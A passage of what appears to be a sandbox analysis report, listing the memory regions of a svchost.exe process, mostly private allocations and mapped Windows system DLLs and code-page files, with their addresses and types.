end_va = 0x48d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 991 start_va = 0x48e0000 end_va = 0x48e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048e0000" filename = "" Region: id = 992 start_va = 0x48f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 993 start_va = 0x49f0000 end_va = 0x49f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 994 start_va = 0x4b60000 end_va = 0x4b61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b60000" filename = "" Region: id = 995 start_va = 0x4bd0000 end_va = 0x4bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 996 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 997 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 998 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 999 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1000 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1001 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1002 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1003 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1004 start_va = 0x54f0000 end_va = 0x55effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000054f0000" filename = "" Region: id = 1005 start_va = 0x55f0000 end_va = 0x55f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000055f0000" filename = "" Region: id = 1006 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1007 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1008 start_va = 0x5800000 end_va = 0x587ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1009 start_va = 0x5880000 end_va = 0x597ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 1010 start_va = 0x5a00000 end_va = 0x5a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1011 start_va = 0x5b80000 end_va = 0x5c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b80000" filename = "" Region: id = 1012 start_va = 0x5c80000 end_va = 0x5d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c80000" filename = "" Region: id = 1013 start_va = 0x5e80000 end_va = 0x5f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e80000" filename = "" Region: id = 1014 start_va = 0x5f80000 end_va = 0x607ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f80000" filename = "" Region: id = 1015 start_va = 0x6080000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006080000" filename = "" Region: id = 1016 start_va = 0x6180000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006180000" filename = "" Region: id = 1017 start_va = 0x63c0000 end_va = 0x64bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063c0000" filename = "" Region: id = 1018 start_va = 0x6560000 end_va = 0x6564fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1019 start_va = 0x6570000 end_va = 0x657ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1020 start_va = 0x6590000 end_va = 0x6596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 1021 start_va = 0x65a0000 end_va = 0x669ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000065a0000" filename = "" Region: id = 1022 start_va = 0x66a0000 end_va = 0x66b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1023 start_va = 0x66c0000 end_va = 0x66d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1024 start_va = 0x66e0000 end_va = 0x66f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1025 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1026 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1027 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1028 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1029 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1030 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 1031 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 1032 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 1033 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 1034 start_va = 0x7300000 end_va = 0x7310fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1035 start_va = 0x7320000 end_va = 0x7330fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1036 start_va = 0x7340000 end_va = 0x7350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1037 start_va = 0x7360000 end_va = 0x7370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1038 start_va = 0x7380000 end_va = 0x73a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1039 start_va = 0x73b0000 end_va = 0x73e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1040 start_va = 0x73f0000 end_va = 0x7400fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1041 start_va = 0x7410000 end_va = 0x7420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1042 start_va = 0x7430000 end_va = 0x7460fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1043 start_va = 0x7470000 end_va = 0x74a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1044 start_va = 0x7600000 end_va = 0x76fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007600000" filename = "" Region: id = 1045 start_va = 0x7700000 end_va = 0x77fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007700000" filename = "" Region: id = 1046 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 1047 start_va = 0x79a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000079a0000" filename = "" Region: id = 1048 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b00000" filename = "" Region: id = 1049 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 1050 start_va = 0x85a0000 end_va = 0x869ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085a0000" filename = "" Region: id = 1051 start_va = 0x86a0000 end_va = 0x879ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086a0000" filename = "" Region: id = 1052 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1053 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1054 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1055 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1056 start_va = 0x7ff6bac60000 end_va = 0x7ff6bac6cfff monitored = 0 entry_point = 0x7ff6bac63980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1057 start_va = 0x7ffb0ad40000 end_va = 0x7ffb0ad56fff monitored = 0 entry_point = 0x7ffb0ad47520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1058 start_va = 0x7ffb0ae60000 end_va = 0x7ffb0aea3fff monitored = 0 entry_point = 0x7ffb0ae883e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1059 start_va = 0x7ffb0afc0000 end_va = 0x7ffb0b01cfff monitored = 0 entry_point = 0x7ffb0afee510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1060 start_va = 0x7ffb0d8f0000 end_va = 0x7ffb0d907fff monitored = 0 entry_point = 0x7ffb0d8fb850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1061 start_va = 0x7ffb0d930000 end_va = 0x7ffb0dbdffff monitored = 0 entry_point = 0x7ffb0d931cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1062 start_va = 0x7ffb0e150000 end_va = 0x7ffb0e181fff monitored = 0 entry_point = 0x7ffb0e15b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1063 start_va = 0x7ffb0e500000 end_va = 0x7ffb0e60efff monitored = 0 entry_point = 0x7ffb0e53c010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1064 start_va = 0x7ffb0e610000 end_va = 0x7ffb0e64efff monitored = 0 entry_point = 0x7ffb0e6382d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1065 start_va = 0x7ffb0e6f0000 end_va = 0x7ffb0e707fff monitored = 0 entry_point = 0x7ffb0e6f1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1066 start_va = 0x7ffb0f060000 end_va = 0x7ffb0f067fff monitored = 0 entry_point = 0x7ffb0f0613b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1067 start_va = 0x7ffb0f070000 end_va = 0x7ffb0f080fff monitored = 0 entry_point = 0x7ffb0f0728d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1068 start_va = 0x7ffb0f1c0000 end_va = 0x7ffb0f1d1fff monitored = 0 entry_point = 0x7ffb0f1c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1069 start_va = 0x7ffb0f330000 end_va = 0x7ffb0f44cfff monitored = 0 entry_point = 0x7ffb0f35fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1070 start_va = 0x7ffb0f450000 end_va = 0x7ffb0f46cfff monitored = 0 entry_point = 0x7ffb0f454f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1071 start_va = 0x7ffb0f470000 end_va = 0x7ffb0f4d6fff monitored = 0 entry_point = 0x7ffb0f47b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1072 start_va = 0x7ffb0f4e0000 end_va = 0x7ffb0f4f3fff monitored = 0 entry_point = 0x7ffb0f4e2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1073 start_va = 0x7ffb10ae0000 end_va = 0x7ffb10b15fff monitored = 0 entry_point = 0x7ffb10ae27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1074 start_va = 0x7ffb10d70000 end_va = 0x7ffb10d8efff monitored = 0 entry_point = 0x7ffb10d74960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1075 start_va = 0x7ffb10e10000 end_va = 0x7ffb10e20fff monitored = 0 entry_point = 0x7ffb10e17480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1076 start_va = 0x7ffb10e30000 end_va = 0x7ffb10eb3fff monitored = 0 entry_point = 0x7ffb10e48d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1077 start_va = 0x7ffb10f40000 end_va = 0x7ffb10f55fff monitored = 0 entry_point = 0x7ffb10f455e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1078 start_va = 0x7ffb10f60000 end_va = 0x7ffb11035fff monitored = 0 entry_point = 0x7ffb10f8a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1079 start_va = 0x7ffb11040000 end_va = 0x7ffb110a3fff monitored = 0 entry_point = 0x7ffb1105bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1080 start_va = 0x7ffb110b0000 end_va = 0x7ffb110d4fff monitored = 0 entry_point = 0x7ffb110b9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1081 start_va = 0x7ffb110e0000 end_va = 0x7ffb110f3fff monitored = 0 entry_point = 0x7ffb110e1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1082 start_va = 0x7ffb11100000 end_va = 0x7ffb111f5fff monitored = 0 entry_point = 0x7ffb11139590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1083 start_va = 0x7ffb11200000 end_va = 0x7ffb11273fff monitored = 0 entry_point = 0x7ffb11215eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1084 start_va = 0x7ffb11280000 end_va = 0x7ffb113b6fff monitored = 0 entry_point = 0x7ffb112c0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1085 start_va = 0x7ffb11470000 end_va = 0x7ffb11485fff monitored = 0 entry_point = 0x7ffb11471af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1086 start_va = 0x7ffb11490000 end_va = 0x7ffb114a9fff monitored = 0 entry_point = 0x7ffb11492330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1087 start_va = 0x7ffb114b0000 end_va = 0x7ffb114bcfff monitored = 0 entry_point = 0x7ffb114b1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1088 start_va = 0x7ffb115e0000 end_va = 0x7ffb115eefff monitored = 0 entry_point = 0x7ffb115e4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1089 start_va = 0x7ffb11680000 end_va = 0x7ffb11690fff monitored = 0 entry_point = 0x7ffb11682fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1090 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1091 start_va = 0x7ffb116c0000 end_va = 0x7ffb11741fff monitored = 0 entry_point = 0x7ffb116c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1092 start_va = 0x7ffb12610000 end_va = 0x7ffb12651fff monitored = 0 entry_point = 0x7ffb12613670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1093 start_va = 0x7ffb12660000 end_va = 0x7ffb126a5fff monitored = 0 entry_point = 0x7ffb126679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1094 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 1095 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 1096 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 1097 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 1098 start_va = 0x7ffb127f0000 end_va = 0x7ffb12807fff monitored = 0 entry_point = 0x7ffb127f4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 1099 start_va = 0x7ffb12810000 end_va = 0x7ffb12834fff monitored = 0 entry_point = 0x7ffb12815ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 1100 start_va = 0x7ffb12850000 end_va = 0x7ffb12890fff monitored = 0 entry_point = 0x7ffb12853750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1101 start_va = 0x7ffb128a0000 end_va = 0x7ffb12992fff monitored = 0 entry_point = 0x7ffb128c5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1102 start_va = 0x7ffb12a60000 end_va = 0x7ffb12a77fff monitored = 0 entry_point = 0x7ffb12a62000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1103 start_va = 0x7ffb12a80000 end_va = 0x7ffb12c01fff monitored = 0 entry_point = 0x7ffb12a982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1104 start_va = 0x7ffb12c10000 end_va = 0x7ffb12cb2fff monitored = 0 entry_point = 0x7ffb12c12c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1105 start_va = 0x7ffb12cc0000 end_va = 0x7ffb12d11fff monitored = 0 entry_point = 0x7ffb12cc5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1106 start_va = 0x7ffb12d40000 end_va = 0x7ffb12d6dfff monitored = 1 entry_point = 0x7ffb12d42300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 1107 start_va = 0x7ffb12d70000 end_va = 0x7ffb12dcdfff monitored = 0 entry_point = 0x7ffb12d75080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 1108 start_va = 0x7ffb12dd0000 end_va = 0x7ffb12deffff monitored = 0 entry_point = 0x7ffb12dd1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 1109 start_va = 0x7ffb12df0000 end_va = 0x7ffb12df8fff monitored = 0 entry_point = 0x7ffb12df18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 1110 start_va = 0x7ffb12e00000 end_va = 0x7ffb12e10fff monitored = 0 entry_point = 0x7ffb12e01d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1111 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1112 start_va = 0x7ffb12fb0000 end_va = 0x7ffb12febfff monitored = 0 entry_point = 0x7ffb12fb6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1113 start_va = 0x7ffb13040000 end_va = 0x7ffb1308bfff monitored = 0 entry_point = 0x7ffb13055310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1114 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1115 start_va = 0x7ffb14500000 end_va = 0x7ffb14534fff monitored = 0 entry_point = 0x7ffb1450a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 1116 start_va = 0x7ffb16be0000 end_va = 0x7ffb16beffff monitored = 0 entry_point = 0x7ffb16be1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 1117 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1118 start_va = 0x7ffb19500000 end_va = 0x7ffb19521fff monitored = 0 entry_point = 0x7ffb19512540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1119 start_va = 0x7ffb19530000 end_va = 0x7ffb19604fff monitored = 0 entry_point = 0x7ffb1954cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1120 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1121 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1122 start_va = 0x7ffb1a350000 end_va = 0x7ffb1a358fff monitored = 0 entry_point = 0x7ffb1a3521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" 